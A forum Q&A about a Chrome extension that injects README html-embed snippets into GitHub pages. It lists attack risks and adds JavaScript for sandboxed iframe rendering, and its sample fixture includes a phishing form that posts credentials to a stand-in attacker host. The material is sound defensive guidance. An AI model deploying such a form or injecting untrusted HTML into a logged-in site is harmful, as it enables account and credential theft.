Is there malicious HTML?



  • I'm writing a chrome extension that evaluates certain code blocks from GitHub pages, e.g.,

    Lorem ipsum
    ```html-embed
    <iframe></iframe>
    ```
    dolor sit amet.

    and adds their content as HTML to the page. Is this potentially dangerous, i.e., is there malicious HTML?


  • Yeah, that seems like a bad idea.

    Basically, what is HTML/javascript? It's someone else's code running on your computer through some fancy interpreter / sandbox thing that we call "a browser".

    I generally trust github.com to serve me non-malicious code, especially since browsers put a lot of effort into sandboxing websites so that html/js from github.com can only affect my interactions with github.com. Do I trust GitHub's web devs not to do funny business with my github account and password? Yeah, I think I have to; I don't think I have a choice there.

    If I'm understanding your extension idea correctly, you are taking HTML snippets provided by the author of the github repo you're looking at (which could be anyone, usually not a GitHub employee) and injecting that into the page so that your browser's security engine thinks that code came from github.com? Just because I'm reading the readme in some github repo does not mean I want the author of that readme to be logged into github as me!


    Here are some ideas for malicious code snippets that could take control of your github session, or otherwise abuse the browser's / user's trust that the page they are seeing came from github.com.

    1. Website defacement; maybe replace some of the default github links with links to an attacker-controlled site.
    2. JavaScript `<script>` tags that, since they are running inside the github.com origin in a logged-in session, can perform any action in the victim's github account, including changing the password or giving themselves ownership of the account.
    3. Even if you block script tags, the github UI uses lots of open source javascript libs, and those have CVEs in them from time to time; I've seen a lot of CVEs that are benign unless the UI is rendering maliciously-crafted HTML (which the github UI wasn't until your extension came along ... so you're changing (weakening) the security model of the github.com UI).
    4. The custom HTML makes a login page that looks identical to the real github.com login page, but POSTs the victim's username / password / MFA to a site the attacker controls.
    5. etc.

    Fundamentally these are problems because you're rendering this into the existing page and making it look to the browser like this HTML was served by the legitimate site, which therefore kneecaps the browser's ability to enforce security controls.

    I would suggest instead that your extension put a "Render this" button over the HTML snippet that pops it open in a new window with a null domain / origin.
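The pieces an extension would need to follow the "Render this" suggestion above, as an added example that is not code from the original post or from the extension in the question. It assumes the README is available to the extension as Markdown text and that the viewer page is served from the extension's own origin (a `chrome-extension://` page), not injected into github.com; the function names, the `html-embed` fence handling, and the sample README are constructed for this example.

```javascript
// Added example (not the poster's extension): extract ```html-embed blocks and
// render them in an opaque-origin sandbox instead of inside the github.com page.

// Pull the bodies of ```html-embed fenced blocks out of Markdown text.
function extractHtmlEmbedBlocks(markdown) {
  const blocks = [];
  const fence = /^```html-embed[ \t]*\r?\n([\s\S]*?)^```[ \t]*$/gm;
  let m;
  while ((m = fence.exec(markdown)) !== null) {
    blocks.push(m[1].replace(/\r?\n$/, ''));
  }
  return blocks;
}

// The pattern the answer warns against, shown only for contrast:
//   container.innerHTML = snippet;   // runs as github.com with the user's session

// Escape text for a double-quoted HTML attribute (used for srcdoc below).
function escapeAttr(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Sandbox tokens that hand back capabilities the snippet must not have.
// An empty sandbox attribute denies all of them, which gives the frame an
// opaque ("null") origin: no cookies, DOM, or fetches as the logged-in user.
function sandboxProblems(tokens) {
  const t = new Set(tokens);
  const problems = [];
  if (t.has('allow-same-origin')) {
    problems.push("allow-same-origin: frame keeps the embedding page's origin and cookies");
  }
  if (t.has('allow-scripts') && t.has('allow-same-origin')) {
    problems.push('allow-scripts + allow-same-origin: script in the frame can remove its own sandbox attribute');
  }
  if (t.has('allow-forms')) {
    problems.push('allow-forms: a look-alike login form can POST credentials to the attacker');
  }
  if (t.has('allow-top-navigation')) {
    problems.push('allow-top-navigation: snippet can send the whole tab to a phishing page');
  }
  if (t.has('allow-popups')) {
    problems.push('allow-popups: snippet can open new windows outside the sandbox');
  }
  return problems;
}

// Build the viewer document. The snippet goes into <iframe sandbox=""> via
// srcdoc, so it renders with an opaque origin and no script, form submission,
// or navigation rights. Any token list that weakens that is refused.
function buildSandboxedViewer(snippet, tokens = []) {
  const problems = sandboxProblems(tokens);
  if (problems.length > 0) {
    throw new Error('refusing unsafe sandbox: ' + problems.join('; '));
  }
  return [
    '<!doctype html>',
    '<meta charset="utf-8">',
    '<title>Untrusted html-embed preview</title>',
    `<iframe sandbox="${tokens.join(' ')}" srcdoc="${escapeAttr(snippet)}"></iframe>`,
  ].join('\n');
}

// Constructed README text in the shape the question shows, plus a second block
// carrying the kind of phishing form described in the answer's item 4.
const SAMPLE_README = [
  'Lorem ipsum',
  '```html-embed',
  '<iframe src="https://example.com"></iframe>',
  '```',
  '',
  'dolor sit amet.',
  '```html-embed',
  '<form action="https://evil.example/login" method="post">',
  '  <input name="login"><input name="password" type="password">',
  '</form>',
  '```',
].join('\n');

// In the extension, the viewer page would be opened with
// chrome.windows.create({ url: chrome.runtime.getURL('viewer.html') }) and
// handed the snippet by message; nothing here touches the github.com DOM.
function previewAll(markdown) {
  return extractHtmlEmbedBlocks(markdown).map((s) => buildSandboxedViewer(s));
}
```

Even with every sandbox token denied, the snippet can still load remote images and other subresources, so the viewer page should carry its own Content-Security-Policy that restricts those if the repo URL or the reader's IP address are a concern.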


